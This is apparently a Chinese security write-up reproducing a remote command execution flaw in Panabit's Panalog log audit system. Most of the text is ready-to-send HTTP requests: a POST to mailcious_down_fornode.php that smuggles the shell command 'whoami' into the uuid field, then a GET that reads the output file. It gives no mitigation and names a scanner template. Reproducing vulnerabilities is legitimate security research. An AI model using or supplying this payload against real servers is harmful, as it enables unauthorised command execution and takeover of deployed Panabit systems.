panabit日志审计系统mailcious_down_fornode远程命令执行漏洞

一、漏洞简介

panalog为北京派网软件有限公司,一款流量分析,日志分析管理的一款软件。panabit日志审计系统mailcious_down_fornode远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。

二、影响版本

三、资产测绘

1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png

四、漏洞复现

POST /mailcious_down_fornode.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Content-Length: 40
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1,192.168.170.105,172.10.107.143

action=check&uuid=;whoami > pobjejsh.txt

1708524892745-3b5bf667-ecd6-4a9b-bbce-5c21566165de.png

获取命令执行结果

GET /pobjejsh.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Type: text/plain
Accept-Encoding: gzip, deflate

1708524929552-5534bed2-5da0-4c33-a551-21bc90dbe0ec.pngpanabit-mailcious-down-fornode-远程命令执行.yaml

更新: 2024-02-29 23:57:14
原文: https://www.yuque.com/xiaokp7/ocvun2/qkhnzs3bu0s8zxxn